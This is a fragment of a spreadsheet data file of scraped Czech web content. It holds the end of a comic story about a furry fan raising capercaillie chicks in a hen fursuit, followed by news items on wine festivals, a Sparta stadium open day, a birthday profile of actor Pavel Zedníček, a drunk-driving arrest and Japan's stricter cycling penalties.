výrazu obličeje nebylo jasné, zda balancuje na pomezí vzteku nebo pláče. Arnošt nebyl bez srdce, a i když z duše nenáviděl úředníky, ty ze správy národního parku obzvláště, začalo mu jí být líto. „Alenko, podívejte.“ Zhluboka se nadechl a zkusil to po dobrém, i když oběma bylo jasné, že takhle familiérně ji oslovil poprvé a naposledy. „Potřebujeme někoho, kdo je schopen vychovat kuřata a ukázat jim, jak přežít ve volné přírodě. A to je u tetřevů výhradně záležitost slepice. Kohout se umí jen naparovat a spářit, všechno ostatní je na slepici. Omlouvám se, že jsme si to nevysvětlili dřív, než vyšel ten inzerát.“ „Dobrá.“ Alice nebyla zlá, a i když jí biologové z duše lezli na nervy, přijala podávaný smír tak, jak byl nabídnut. Upřímně. Nicméně se začala smiřovat s tím, že tyhle lidi nikdy nepochopí. Vědci. „To už je teď jedno. A stejně bych tu slepici do inzerátu nemohla uvést, musíme být genderově korektní. Kvůli nařízením Evropské unie .“ „Což tetřev tedy nesplňuje. Málokteré zvíře na našem území je tak pohlavně dimorfní.“ „Pohlavně co?“ „Dimorfní. Dvojtvárné. To znamená, že samec a samice se výrazně odlišují. Ani byste nepoznala, že jde o jeden druh. “ Arnošt se zamyslel. „To by v tom inzerátu nešlo využít?“ „No, popravdě jsem ráda, že se nám vůbec někdo přihlásil. Pochybuju, že druhé kolo by dopadlo lépe. Máme tu dokonce dvacet tři životopisů, což vůbec není špatný výsledek. Když jsme hledali geologa, přihlásili se jen dva uchazeči. Říďa zuřil.“ Nabídla mu kávu a k vytištěným životopisům se posadili bok po boku. Přestali se nekonstruktivně dohadovat a dali hlavy dohromady. Po vytřídění jim zbyli čtyři uchazeči. Kromě tetřeva Kamila, pro Alici jasného favorita, jedna krůta a dvě labutě. Ty přiřadili spíš jen kvůli řediteli, který měl při pohovorech rád pocit, že si může vybírat. Arnošt jednoznačně preferoval krůtu, jako samici nejbližšího příbuzného druhu. Biolog se poděkoval, a jakmile za ním zapadly dveře, zvedla Alice telefon a zcela nekorektně zavolala tetřevovi Kamilovi, aby se připravil na roli slepice. Kamil se do telefonu trochu zajíkal, ale to mohlo být způsobeno tím, že o tohle místo tak strašně stál. Děkoval Alici asi pět minut. Teď už záleželo jen na tom, jak dopadnou pohovory. Alice ze srdce doufala, že její favorit nevybuchne, strašně nerada by tenhle konkurz vypisovala znovu. Už teď si připadala jako největší idiot pod sluncem. „Měla jsem zůstat v tom automotivu.“ Povzdechla si, když do desek sbírala životopisy uchazečů s fotkami v nejrůznějších zvířecích maskách. - - - - Furry fandom se zabývá antropomorfními zvířecími postavami. Tyto postavy mají lidskou osobnost a další lidem podobné vlastnosti. Příkladem takových vlastností jsou obličejové výrazy, schopnost mluvit, chodit po dvou a nosit oblečení. Furry fandom tvoří komunita lidí, kteří se schází na internetu nebo na Furry srazech. Ve Furry fandomu jsou také oblíbené kostýmy zvané fursuity. Všichni jsou furries, i když ptačí postavy jsou označovány jako avian. Ale jakákoli zvířecí fursona je fursona, i když není chlupatá. Wikipedia.org, Otevřená encyklopedie Výraz fursona vznikl spojením anglických slov furry a persona (osoba, osobnost). Označuje furríkovu virtuální identitu - tvora, který ve furry světě reprezentuje svého majitele vzhledem i vlastnostmi. Fursona může být různě podrobná, od detailní představy vlastního furry já, přes obecné aspekty (barva srsti, chování, morfická či zvířecí postava) nebo nemusí existovat vůbec - daný furry prožívá svůj vztah ke zvířeti bez toho, aby si jej formou fursony definoval. Rozhodnutí, zda fursonu vytvořit či nikoli, závisí jen na konkrétním jedinci. Furry dokonce těchto postav muže mít víc, ale jen jedna bývá hlavní. Fursona se může časem i vyvíjet a stejně jako bude přebírat nálady a postoje od svého majitele, může se nakonec stát, že i on od své fursony dostane některé povahové rysy. Wikifur.com, encyklopedii o furry fandomu - - - - „Takže se cítíte kompetentní vychovávat tetřeví kuřata? Výborně.“ Ředitel se zvedl a tím skončila formální část pohovoru. Za standardnějších okolností by Alice cítila uspokojení, že její instinkt dlouholeté personalistky nezklamal a opět „zvítězil“ její uchazeč, ale takhle si jen oddechla, že Kamil dokázal poslechnout její rady a navzdory masce s impozantními ocasními pery předvedl téměř dokonale chování tetřeví slepice. Popravdě, když nakráčel do zasedačky, v robustním kostýmu, se kterým se jen tak tak protáhl dveřmi, a při tom těkal hlavou ze strany na stranu, až mu vole nadskakovalo, měla Alice pochyby o duševním stavu jich všech. Nicméně během pohovoru se osvětlilo, že Kamil pro tuto vzácnou příležitost zvolil svoji nejlepší masku s realistickou hlavou. Maska měla kvůli věrohodnosti bohužel jen malá očka, kterými nebylo vidět, takže si musel pomáhat přidržováním zobáku směrem dolů a kroucením hlavou ze strany na stranu. Což ředitele během jeho prezentace nové politiky parku v otázce přežití tetřeví populace zjevně znervózňovalo. Byl ale profesionál, takže po pár větách se mu vrátil klid. „Tetřeví populace poklesla v posledním století pod životaschopné minimum, jak jistě víte. Finančně velmi náročné reintrodukční pokusy, které proběhly na řadě míst v Čechách a během nichž se u nás do přírody dostaly desítky ptáků, nepřinesly očekávané výsledky. A ani jeden z reintrodukčních programů, které probíhaly v uplynulých letech v západní Evropě , rovněž nevedly k vytvoření dlouhodobě životaschopné populace.“ „Příčin může být několik.“ Skočil mu do řeči Arnošt. „Od nepřipravenosti v zajetí odchovaných ptáků na podmínky života ve volné přírodě, přes vysokou míru predace v narušeném prostředí, až k nevhodným způsobům vypouštění.“ Ředitel si rychle vzal slovo zpátky. „Učinili jsme mnohá opatření, z nichž nejvýraznější je vyhlášení klidových zón, tedy zavírání prostor, ve kterých tetřevové tokají a hnízdí. Pomalu to přináší výsledky, podle posledních sčítání už je tetřeví populace zřejmě na udržitelných hodnotách, ale tato opatření jsou u veřejnosti čím dál tím nepopulárnější. Musíme nasazovat stále více strážců, abychom klidové zóny uhlídali, což nám zasahuje do rozpočtu, a stejně to nepřináší výsledky. Návštěvníci parku mají pocit, že jim opět zavíráme hranice, a pravidla čím dál častěji porušují. Začínají se dovolávat „zelené opony“ a celá ta věc se stává politickou. A politici jsou ti, kteří nás ze státního rozpočtu platí. Abychom se vyhnuli této patové situaci, vymysleli jsme program pro výchovu uměle odchovaných tetřevů přímo ve volné přírodě. Jsme vůbec první na světě, kdo s touhle myšlenkou přišel, a pokud se to podaří, budeme vlajkovou lodí všem ostatním národním parkům. Původně jsme chtěli zaměstnat strážce, nicméně se z jejich strany zvedla vlna nesouhlasu, a když je pak podpořily i odbory…“ Arnošt rychle zasáhl. „A nehledáme někoho, koho budeme muset pracně učit a to navíc s nejistým výsledkem. Hledáme hotového člověka, který má nejen znalosti, ale i patřičné nadšení.“ Po svém poněkud absurdním entrée předvedl Kamil tak hluboký vhled do etologie tetřeva, že před ním smekl i Arnošt. Kamil se nejprve zajíkával, ale když se po pár Arnoštovo vhodně zvolených dotazech rozmluvil o rozdílech ve stravě tetřevích kuřat a dospělců, o nebezpečích, která na ně čekají v podobě turistů, lovců, lišek a dalších predátorů, o vražedných drátěných oplocenkách a neméně zabijáckých lanovkách i o náročné termoregulaci čerstvě vylíhlých kuřat, byla jeho řeč nejen zcela plynulá, ale měla i hlavu a patu. A právě Arnoštovo slovo, jako odborníka, bylo při pohovoru rozhodující. Když několikrát zdůraznil, že pro kuřata není důležité, zda je učí kohout nebo slepice, ale záleží na chování samém, bylo rozhodnuto. Kamil byl víc než ochotný si osvojit zvyky tetřeví slepice, ale pořídit si nový kostým, „fursuit“, to už byla jiná liga. Tahle zábava lezla do peněz, každý fursuit měl hodnotu menšího ojetého vozu. Nicméně si plácli a ředitel odcházel dokonce s vágním příslibem, že pokud se projekt ujme, respektive pokud se ujmou vychovaná tetřeví kuřátka, mohla by správa parku nový fursuit Kamilovi případně zaplatit. Koneckonců, šlo vlastně o něco jako uniformu strážce a zároveň nezbytnou pracovní pomůcku, ať už si účetní říkají, co chtějí. - - - - Kamil se smutně zahleděl na stromy v tokaništi. I když už dva roky nosil fursuit slepice, nostalgicky si vyskočil alespoň do nejnižších větví, ale během pár okamžiků ho poděšené kvokání kuřátek přivolalo zpět. Když jim lovil žížaly, poněkud cynicky vzpomínal na naivní nadšení, se kterým do téhle práce před čtyřmi lety nastoupil. Tenkrát v tom viděl splněný sen, jedinečnou možnost, jak uplatnit svoje druhé zvířecí já, a možná i příležitost změnit náhled na celou komunitu furries. Vždyť všichni kolem, včetně jeho rodičů, ho považovali, když ne rovnou za blázna, tak minimálně za neužitečného podivína. Takhle by mohl dokázat obhájit své místo na slunci. Když ne před radikálními anti-furries, tak minimálně před svým otcem. Ale kdo ví, třeba se mu povede i zlepšit nelichotivý obrázek, jenž na komunitu vrhl díl seriálu Kriminálka Las Vegas, který jen kvůli mediální pozornosti zpodobnil furríky jako sexuální devianty. A třeba právě on, Kamil, by mohl prokázat ryzí prospěšnost antropomorfního já. Před lety se zkrátka - na chvíli - pošetile cítil jako statečný průkopník. Ze začátku zkrátka vnímal na téhle práci samá pozitiva a opřel se do ní se vší vervou. První sezónu ještě neměl zkušenosti, a než se administrativně vyřídil jeho nástup, uteklo jim pár prvních snůšek. Ale i tak se mu povedlo ze čtyřiceti vajec vypiplat dvacet šest mláďat a z nich se dospělosti dožilo plných osmnáct. A další sezónu byl ještě úspěšnější. Ovšem za cenu toho, že od května trávil v práci dvacet čtyři hodin denně. Práce s kuřaty ho bavila, ale zahřívání vajíček začínal nenávidět. Nicméně nešlo to jinak, bezpodmínečně musel být první, koho kuřata po vylíhnutí uvidí, aby si ho zafixovala jako matku. Jen tak bylo zaručeno, že ho budou slepě následovat. Vypadalo to jednoduše, ale po pár jarních týdnech se pokaždé cítil unuděný k smrti a vyčerpaný samotou. Výchova kuřátek už byla o něco veselejší – dělala mu společnost svým švitořením a on se cítil opravdu dobře, když jim mohl předávat dovednosti. Ať už šlo o vyhledávání potravy nebo vyhýbání se nebezpečím. Na to se obzvlášť soustředil. Společnost tetřevích kuřátek ho nenaplňovala tolik, jako si kdysi, když byl obyčejným víkendovým furríkem představoval, ale jejich kvokání ho mile rozptylovalo. Alespoň ty první roky. Teď už ho netěšilo nic, ani výchova mladých. Možná to souviselo s tím novým kostýmem – bez ocasních per se cítil jako… zkrátka jako obyčejná slepice. Navíc prostě nebyl samice, chyběly mu ty správné pudy. Mohl kuřata připravovat, jak nejlépe to šlo, ale jeho to nenaplňovalo. Přírodě zkrátka neporučíš a on byl prostě ze své přirozenosti kohout a ne žádná slepice. Při vysedávání na vajíčkách snil o smažených volských ocích, a ke kuřatům byl paradoxně tím netrpělivější, čím víc jich zdárně odchoval. Stále také myslel na to, jak po ukončení minulé sezóny vyděsil sám sebe, když doma minul skříň se svým nejoblíbenějším kohoutím fursuitem, převlékl se do džínů a na místo na páteční furry sraz, vyrazil do obchoďáku. Měl nutkavý pocit, že se zblázní, jestli nebude zas chvíli samcem. Během pár týdnů volna se to srovnalo, ale s blížícím se podzimem se bál, co vyvede tentokrát. Vždyť kdyby ztratil vztah se svojí fursonou, už by se tu nedokázal procházet v tom těžkém a směšném kostýmu. Přišel by o všechny přátele, o svoji práci, a hlavně o možnost se prosadit, dokázat, že za něco stojí. Minulý měsíc navíc oslavil narozeniny, a to ne narozeniny ledajaké, ale kulaté. První začínající trojkou. Od té doby v něm hlodal pocit, že by se měl začít chovat jako dospělý muž, stále urputněji. A proti tomu stála tahle práce, která se ještě před pár lety jevila plná příležitostí. Navíc se mu opravdu dařilo. Podle vedení parku, ale hlavně podle plynulého nárůstu tetřeví populace, si vedl výborně. Měl to všechno zahodit? Jen kvůli pocitu, že mu to ubírá na mužnosti, což je v dnešní postmoderní době pojem tak rozostřený, že už nikdo neví, co si za ním vlastně představit, tím méně furrík na prahu třicítky. To dilema ho rozežíralo víc a víc. Bylo načase se mu postavit čelem, ať už jako muž nebo tetřeví slepice, a jednou provždy se rozhodnout. Kamil si sundal hlavu, aby se mu lépe dýchalo a představil si sám sebe za deset let. Modrý límeček zaměstnaní v korporátu, manželka, hypotéka a dvě krásné zdravé děti. Každých pět let nový automobil, každé léto rodinná dovolená u moře a každou zimu týden lyžování v Alpách. Čtyřikrát ročně víkend s kolegy, alkohol , strip bary a pouze lehké drogy. Zdravotní a penzijní pojištění, havarijní a cestovní připojištění. Nedělní rodinné obědy, nábytek z Ikei, večírky se sousedy, sportovní zápasy dětí, letní grilovačky na terase u bazénu. Kamil zavřel oči, aby se mu ten obrázek lépe vryl do mozku. Pak si nasadil hlavu slepice a s vděčným úsměvem se dokolébal zpátky ke kuřátkům, u kterých si teprve teď uvědomil, jak nenáročná vlastně jsou. A on je teď slepice, takže už žádné skákání na větve. „Čert vem celou zk….ou mužnost.“ Mumlal si při ozobávání borůvek.</t>
  </si>
  <si>
    <t>427850</t>
  </si>
  <si>
    <t>20241101_104_3264788652_cb5effd4e64595206989.html</t>
  </si>
  <si>
    <t>cb5effd4e64595206989</t>
  </si>
  <si>
    <t>Uherské Hradiště: Svatý Martin a žehnání vína</t>
  </si>
  <si>
    <t>Uherské Hradiště : Svatý Martin a žehnání vína Tradiční obřad žehnání svatomartinského vína v Uherském Hradišti patří k nejhezčím podzimním akcím. Žehnání svatomartinského vína se sv. Martinem na koni, folklorním programem a degustací vín začne v pondělí 11. 11. v 11 hodin a 11 minut na Masarykově náměstí v Uherském Hradišti . Samotný akt žehnání vína se bude v Uherském Hradišti konat už po devatenácté. Doprovázet jej bude příjezd sv. Martina v doprovodu římských vojáků, aby si přihlížející, kterých je vždycky plné náměstí, připomněli legendární příběh o žebrákovi a darovaném plášti. Na co se všichni těší asi nejvíce, bude následná degustace svatomartinských a mladých vín. K ochutnání bude kolem 50 vzorků vín od vinařů, kteří pocházejí výhradně z vinařské slovácké oblasti. Nouze ale samozřejmě nebude ani o něco na zub. K tomu poslouží tradiční svatomartinské speciality studené i teplé kuchyně. Připojte se k tradici! Přijďte si v pondělí 11. 11. v 11:11 užít slavnostní podzimní atmosféru, provoněnou vínem a okořeněnou folklorním programem! Tento článek je uzamčen Po kliknutí na tlačítko "odemknout" Vám zobrazíme odpovídající možnosti pro odemčení a případnému sdílení článku. Přidejte si PL do svých oblíbených zdrojů na Google Zprávy . Děkujeme. Foto: Filip Ferbie Popisek: Návštěvu Uherského Hradiště premiér Bohuslav Sobotka zakončil na Masarykově náměstí setkáním s obyvateli města Rubrika transition_slide Obce voličům</t>
  </si>
  <si>
    <t>202430</t>
  </si>
  <si>
    <t>209420</t>
  </si>
  <si>
    <t>20241101_105_3264808629_de49c5afb336d4ba7c0c.html</t>
  </si>
  <si>
    <t>de49c5afb336d4ba7c0c</t>
  </si>
  <si>
    <t>Den otevřených dveří</t>
  </si>
  <si>
    <t>Den otevřených dveří Zahajujeme oslavy 131. výročí našeho klubu Sdílet Publikováno V pátek 15. listopadu od 14:00 se epet ARENA otevře všem fanouškům Sparty , kteří získají jedinečnou příležitost prohlédnout si místa běžně vyhrazená jen pro členy týmu. Přímo na stadionu bude zároveň přichystán bohatý doprovodný program. Vstupenky na prohlídky můžete zakoupit ZDE. V rámci Dne otevřených dveří vám ukážeme místa našeho stadionu, do kterých se běžný fanoušek nemá šanci dostat. Podíváte se například na novinářskou lávku, do VIP prostor včetně sky boxů, kde se uskutečňují podpisy hráčských smluv, nebo do zázemí sparťanského áčka a tiskového centra. Zkrátka a dobře dostanete příležitost navnímat Letnou z úplně jiné perspektivy. Z blízkosti budete mít možnost prohlédnout si techniku našich trávníkářů, dále se podíváte do zákoutí protilehlé tribuny nebo do našeho kotle. Následně bude samozřejmě prostor také na rychlé občerstvení. Chybět nebude vypečená klobása, pivo a další tradiční dobroty, které znáte ze zápasů. Na místě bude po celou dobu přítomen sparťanský maskot Rudy, který s vámi nebo s vašimi ratolestmi rád vyfotí. K dispozici bude i fotokoutek, v němž bude možnost pořídit další z mnoha narozeninových vzpomínek. Zábavu bude dotvářet také eSport zóna s herními konzolemi PlayStation 5, stolní fotbálek, airbrush tetování či modelování balonků. Průvodcem celým Dnem otevřených dveří bude tištěný magazín připravený speciálně ke 131. narozeninám. Majitelé permanentek a členové Sparta UNLIMITED. si mohou pořídit vstupné za 200,-. Vstupné v klasickém prodeji činí 300,-. Členové Sparta Club Premium a Sparta Club Junior mají vstup ZDARMA. Stačí do sítě ENIGOO vložit své členské číslo a vyzvednout si vstupenku. Děti do 110 cm se na akci vstupenkou prokazovat nemusejí.</t>
  </si>
  <si>
    <t>12290</t>
  </si>
  <si>
    <t>3070</t>
  </si>
  <si>
    <t>20241101_106_3264616767_82eb1f773ce4574983a2.html</t>
  </si>
  <si>
    <t>82eb1f773ce4574983a2</t>
  </si>
  <si>
    <t>Světový duel vín 2024 nabídne opět vína světové extratřídy</t>
  </si>
  <si>
    <t>Světový duel vín 2024 nabídne opět vína světové extratřídy 1. 11. 2024 Aktuality Čtrnáctý ročník unikátní výstavy Světový duel vín 2024 nabídne exkluzivní vína světa a vybraná vína z České republiky . Ta se i letos utkají v pomyslném duelu. Vítěze si ovšem každý určí sám. Akce se stala vyhledávanou mezi odborníky, vinaři i laickou veřejností pro její originalitu. Opět ji budou hostit krásné prostory hustopečského Hotelu Amande. Koná se v sobotu 23. listopadu od 10 do 20 hodin. Výjimečnou akci nejen na Hustopečsku , ale v celé České republice , založil v roce 2008 hustopečský vinař a majitel prestižního butikového vinařství Miroslav Hrabal. Ten s kolegy pravidelně objíždí proslulé vinařské oblasti po celém světě a díky svým bohatým kontaktům a zkušenostem přiváží do Česka vína , ke kterým se běžný člověk jen tak nedostane. Miroslav Hrabal „„Letos by mělo být největším lákadlem burgundské Chardonnay a samozřejmě také Pinoty. Těšit se můžete na Meursault, Chambertin, Chambolle, Pommard, Montrachet a Chablis. Mnohé pak jistě potěší tradiční odrůdy z různých států světa, kterými jsou Ryzlinky, Sauvignony, Merloty nebo třeba Cabernety,“ zve na akci za pořadatele Miroslav Hrabal. Světový duel vín 2024 Zastoupeny budou vinařské velmoci, jakými jsou Francie , Itálie či Německo . Svá vína ale nabídnou i další zajímavé, i když méně typické regiony či země, kterými je určitě Švýcarsko , Lucembursko , Slovinsko , Izrael a Brazílie . Samozřejmostí jsou pak skvělá vína z domácí produkce. Pořadatelem akce je město Hustopeče za finanční podpory pana Karla Losenického. Vstupenky možné zakoupit již nyní v předprodeji za zvýhodněnou cenu 1 900 Kč online na kinohustopece.cz nebo v TIC Hustopeče. Na místě pak bude vstupenka za 2 100 Kč. foto: město Hustopeče Fotogalerie Autor: JP Rubrika transition_slide Aktuality</t>
  </si>
  <si>
    <t>150</t>
  </si>
  <si>
    <t>20241101_107_3264608017_7c3b28e3ceb2b57df7b3.html</t>
  </si>
  <si>
    <t>7c3b28e3ceb2b57df7b3</t>
  </si>
  <si>
    <t>Čerstvého pětasedmdesátníka Pavla Zedníčka oddal syn Waldy Matušky, Bartoška mu zakázal oholit knír</t>
  </si>
  <si>
    <t>Čerstvého pětasedmdesátníka Pavla Zedníčka oddal syn Waldy Matušky, Bartoška mu zakázal oholit knír Jsou herci, které diváci znají stejně tak dobře podle jména, jako přezdívky. Mezi ně určitě patří Pavel Zedníček alias Čmaňa, který dnes slaví pětasedmdesátiny. Jako první mu tak začal říkat Bolek Polívka . Oslovil ho tak před spolužáky, mezi kterými byl Karel Heřmánek či Jiří Bartoška s tím, že vypadá jako typická „Janžurka“, ale proč si to myslel a co tím mínil, možná nevěděl ani on sám, prý to ale znamenalo ve valašském nářečí houští a mělo to souvislost s knírem, který nosil od osmnácti let. I když se Pavel narodil na Vyškovsku, ve Valašském království je ministr všeho, na rozdíl od ostatních, co jsou ministři něčeho a myslí si, že všeho. Nebojí se žádné práce, dědeček byl kovář, otec modelář, on je vyučený švec. Dokonce si navrhl a ušil boty, co poté dlouho nosil. Jeho touhou ovšem bylo být hercem, a to se mu povedlo. „Já netoužil po velkých, dramatických rolích, můj cíl nebyl Hamlet, jen bavit lidi, rád hraju pro děti, je to nejupřímnější publikum, nic totiž nepředstírají. Když se jim něco nelíbí, zívají, nebo odejdou, pokud tam nejsou s učitelkami.“ Svěřuje se. Snaží se žít aktivně, už od mládí hraje tenis. V padesáti přestal kouřit. Vysvětloval to tím, že odhulil třicet let a navíc mu cigarety nijak moc nechutnaly. Pokud jde o zdraví, doufá, že že má geny po babičce, ta se dožila 96 let. „ A to tady mohla být, déle, jenže se rozhodla, že už ji život nebaví. Tak se se všemi rozloučila a usnula navěky. To byl moc krásný konec, “ líčí svůj zážitek Pavel Zedníček . V milostných vztazích je a vždy byl romantik: „ Když vám v pubertě dala holka pusu, bylo to, jako by se vám rozpouštěl mozek v hlavě – pokud byl tedy vůbec přítomen. Na to nezapomenete do konce života, ani když k ničemu víc nedošlo, kam se hrabe nějaký porno. Všichni u něj navíc řvou jako divadelní herec u výplaty! Já, protože jsem z filmové branže, tak si vždy představím, jak se moc usilovně snaží souložit a přitom na ně čumí osvětlovači, „režisér“ jim dává pokyny, kameraman se kolem nich plazí a hledá vhodné záběry. Dost mě to pobaví. “ Pavel je podruhé ženatý. S moderátorkou a scénáristkou Hanou Kousalovou , s níž se seznámil v roce 2003, na svatbu nepospíchali, až v roce 2017 je na Floridě přímo na pláži oddal syn Waldemara Matušky . Vlastní děti nemá, Lucii Zedníčkovou ( Pokornou ) adoptoval v prvním manželství s Tatianou Staudecherovou v jejích osmi letech. Poté, co se s ní rozvedl, jejich vzájemný vztah dost vychladl, ale časem se stabilizoval. Za syna vždy považoval synovce Jakuba, s kterým i vystupoval. Jeho tragická smrt při autonehodě ho hluboce zasáhla, bylo mu jen 27 let. To byla zároveň událost, která narušila jeho pozitivní myšlení a bohužel i podpořila jeho motto: „Lidi sů svině, doba zlá, je hanba vystřízlivět.“ Šlo pochopitelně o nadsázku, ale nijak se netají tím, že má rád slivovici. „I profesor Pirk řekl, že její malý panák po ránu a druhý před spaním zdraví neuškodí. Ale na druhou stranu občasná, a to slovo zdůrazňuju, opilost je dobrá, naučí vás totiž pokoře. Pod vlivem si připadáte nejdřív jako pán světa a druhej den hekáte v posteli se slepenou hubou a je vám blbě,“ líčí Pavel Zedníček svoji filozofii a pokračuje. „A taky si vezměte, kolik šťastných manželství vzniklo díky tomu, že se nesmělej chlap po pár sklínkách odvázal a šel vyznat lásku dámě svého srdce. A když udržíte lehkou špičku, máte spoustu vzpomínek – o ty vás může připravit jenom pan Alzheimer. Jde o rovnováhu. Opít se do němoty není umění, to zvládne každej blbec, ale udělat si jen dobrou náladu, to je ten pravej kumšt. Alkohol má pro mě, stejně jako pro spoustu komiků, dost nepříjemný následek, že se lidi při setkání se mnou odvážou a chtějí po mně abych sypal vtipy z rukávu. Myslí si, že jsem samý hehe, chichi, chacha. Přitom když někdo hraje dramatické role, nikdo mu neříká tragéde a nečeká, že bude chodit v černém a tvářit se jako o funuse. Stačí moderovat soutěž, uvádět zábavné pořady a hned si každý myslí, jaký jste srandista. Pětasedmdesátiny vnímám jako dar, neřeším, jestli od Boha nebo od přírody, je dost lidí, bohužel i z řad mých přátel, kteří se jich nedožili. Mám radost z drobností, toho, že, když se probudím, nic mě nebolí, venku svítí sluníčko. Člověk by měl být vděčný za každý den, nikdy nevíte, jestli nebude ten poslední, může na vás spadnout šutr ze střechy. To není jen o stáří, i mladí umírají, bohužel. Jen asi vnímají jiný pocity jako já. Se jim nedivím, jako ogar jsem byl stejnej. Když jsem po dvaceti letech potkal třeba rodiče nějakého kámoša, připadalo mi divný, že ještě žijí, pro mě byli prostě tenkrát starý, i když jim bylo třeba 35.“ Pavel , stejně jako ptáci, na zimu odlétá do teplých krajin, nejvíc si oblíbil Mexiko . Má - na muže - hodně netradičního koníčka, rád myje nádobí! Má to prý v sobě odmala, kdy musel doma pomáhat. Typický knír oholil jen dvakrát v životě, Jiří Bartoška ho prosil, ať už to nikdy neudělá a přidal nepublikovatelné slovo… Zdroj: https://www.kinobox.cz/osobnosti/22697-pavel-zednicek https://www.csfd.cz/tvurce/1026-pavel-zednicek/prehled/ https://www.ceskatelevize.cz/lide/pavel-zednicek/</t>
  </si>
  <si>
    <t>20241101_108_3245024369_7a2eed5dd000e42cfeb8.html</t>
  </si>
  <si>
    <t>7a2eed5dd000e42cfeb8</t>
  </si>
  <si>
    <t>Jak mluvit s&amp;nbsp;dětmi o&amp;nbsp;alkoholu a&amp;nbsp;jak u&amp;nbsp;nich předejít vzniku závislosti? Nedávejte...</t>
  </si>
  <si>
    <t>Jak mluvit s&amp;nbsp;dětmi o&amp;nbsp; alkoholu a&amp;nbsp;jak u&amp;nbsp;nich předejít vzniku závislosti? Nedávejte... Jak mluvit s dětmi o alkoholu a jak u nich předejít vzniku závislosti? Nedávejte jim pít nealkoholické pivo ani šampaňské, radí odborník na závislosti. Pokud děti každý den vidí v lednici otevřenou láhev vína , mohou alkohol považovat za přirozenou součást života. Foto: Tomáš Benedikovič, Denník N Autor: Ivana Kozáková Autor person Ivana Kozáková Rubrika transition_slide Hlavní</t>
  </si>
  <si>
    <t>66270</t>
  </si>
  <si>
    <t>20241101_109_3245037608_56d5a6630641050e1439.html</t>
  </si>
  <si>
    <t>56d5a6630641050e1439</t>
  </si>
  <si>
    <t>Opilý řidič se po nehodě na Svitavsku pokoušel utéct</t>
  </si>
  <si>
    <t>Opilý řidič se po nehodě na Svitavsku pokoušel utéct Foto: Policie ČR Pardubický kraj Případ se odehrál v sobotu okolo 18. hodiny. Řidič silně ovlivněný alkoholem sednul za volant svého vozidla značky Volkswagen a z Koclířova se rozjel směrem do Svitav , kde si potřeboval vybrat hotovost z bankomatu. Během této zastávky si všimnul, že má prázdné kolo, které se pokoušel vyměnit. To se mu ovšem nepodařilo a ve své jízdě pokračoval dál. Nezastavil ho dokonce ani náraz do jednoho ze zaparkovaných vozidel u svitavské nemocnice. Po několika kilometrech už byl ale řidič na silnici I/34 ve směru zpět na Koclířov donucen zastavit z důvodu devastačního poškození kola. V té samé chvíli už u něj byli policisté z oddělení hlídkové služby, které na lince 158 zalarmoval všímavý svědek. Policisté chtěli muže zkontrolovat, ten však místo pozdravu začal utíkat do pole, kde ho muži zákona rychle doběhli a zadrželi. U 67letého řidiče byla provedena dechová zkouška na alkohol , která byla pozitivní s výsledkem přes 1,8 promile. Policisté ve věci zahájili úkony trestního řízení pro podezření ze spáchání trestného činu ohrožení pod vlivem návykové látky. V případě odsouzení řidiči hrozí trest odnětí svobody až na 3 roky. por. Mgr. Iveta Kopecká Policie ČR Foto: Policie ČR Autor: Pavel Jaňurek Autor person Pavel Jaňurek Rubrika transition_slide Události</t>
  </si>
  <si>
    <t>83380</t>
  </si>
  <si>
    <t>20241101_11_3264680261_47fe3eead5681b686c1e.html</t>
  </si>
  <si>
    <t>47fe3eead5681b686c1e</t>
  </si>
  <si>
    <t>Za jízdu pod vlivem až pět let. Japonsko vytáhlo do boje s nebezpečnými cyklisty</t>
  </si>
  <si>
    <t>Shrnutí Za jízdu pod vlivem až pět let. Japonsko vytáhlo do boje s nebezpečnými cyklisty Pokutu až 152 tisíc korun či dokonce pětiletý trest vězení mohou v Japonsku nově dostat cyklisté, kteří budou při jízdě používat mobilní telefon nebo pojedou pod vlivem alkoholu a způsobí nehodu. Nový zákon vešel v platnost v pátek a už má první uplatnění. Lidem, které policie přistihne při používání mobilního telefonu při jízdě na kole, od pátku nově hrozí vězení až na šest měsíců nebo pokuta až 100 tisíc jenů (přes 15 tisíc korun). Pokud cyklisté s telefonem v ruce způsobí nehodu, mohou jít do vězení až na jeden rok nebo budou muset zaplatit až 300 tisíc jenů (necelých 46 tisíc korun). Dosud byla maximální výše pokuty 50 tisíc jenů (více než 7 600 korun). Zákon přísněji postihuje také jízdu na kole pod vlivem alkoholu . Pokud policie naměří cyklistům více než 0,15 miligramu alkoholu v dechu, hrozí jim až tříletý trest vězení nebo pokuta až půl milionu jenů (přes 76 tisíc korun). Vážnější trestné činy zaviněné cyklistou s alkoholem v krvi mu mohou vynést až pět let vězení nebo finanční postih ve výši jeden milion jenů (přes 152 tisíc korun). Krátce poté, co zákon začal platit, oznámila policie v prefektuře Ósaka na jihu Japonska udělení první pokuty za jízdu pod vlivem alkoholu a vyšetřování dalších šesti případů. Podle Kjódó se stalo mezi lety 2013 až 2017 celkem 295 nehod, které způsobili cyklisté používající telefon. V letech 2018 až 2022 narostl počet nehod o 53,9 procenta na 454. V České republice jsou postihy výrazně mírnější. Pokud cyklista použije za jízdy mobilní telefon, hrozí mu pokuta až 10 tisíc korun. Pokud nadýchá do jedné promile, hrozí mu pokuta do 25 tisíc korun, nad jednu promile pak až 50 tisíc korun. Autor: ČTK Autor ČTK Rubrika transition_slide Události - Svět</t>
  </si>
  <si>
    <t>73440</t>
  </si>
  <si>
    <t>20241101_110_3245002414_99c7e4ece9e6efac120f.html</t>
  </si>
  <si>
    <t>99c7e4ece9e6efac120f</t>
  </si>
  <si>
    <t>Vladimír Dlouhý utíkal z&amp;nbsp;nemocnice do hospody. Utajil dvojčata a&amp;nbsp;bratra miliardáře</t>
  </si>
  <si>
